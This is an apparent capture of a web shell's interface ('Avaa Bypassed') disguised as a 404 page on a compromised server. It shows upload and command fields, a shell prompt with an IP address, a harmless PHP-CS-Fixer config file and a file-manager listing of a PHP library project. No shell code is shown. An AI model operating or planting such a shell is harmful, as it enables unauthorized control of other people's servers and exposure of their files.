404

[ Avaa Bypassed ]




Upload:

Command:

elspacio@3.14.128.200: ~ $
<?php

use Symfony\CS\Config\Config;
use Symfony\CS\Finder\DefaultFinder;

if (class_exists('PhpCsFixer\Finder')) {    // PHP-CS-Fixer 2.x
    $finder = PhpCsFixer\Finder::create()->in([
        'library',
        'tests',
    ]);

    return PhpCsFixer\Config::create()
        ->setRules(array(
            '@PSR2' => true,
        ))
		->setUsingCache(true)
        ->setFinder($finder)
    ;
}

$finder = DefaultFinder::create()->in(
    [
        'library',
        'tests',
    ]);

return Config::create()
    ->level('psr2')
    ->setUsingCache(true)
    ->finder($finder);

Filemanager

Name Type Size Permission Actions
.git Folder 0755
.github Folder 0755
docs Folder 0755
library Folder 0755
tests Folder 0755
.gitattributes File 247 B 0644
.gitignore File 228 B 0644
.php_cs File 612 B 0644
.phpstorm.meta.php File 360 B 0644
.styleci.yml File 224 B 0644
CHANGELOG.md File 8.9 KB 0644
CONTRIBUTING.md File 3.29 KB 0644
LICENSE File 1.47 KB 0644
Makefile File 949 B 0644
README.md File 10.23 KB 0644
composer.json File 1.45 KB 0644
phpunit.xml.dist File 1.54 KB 0644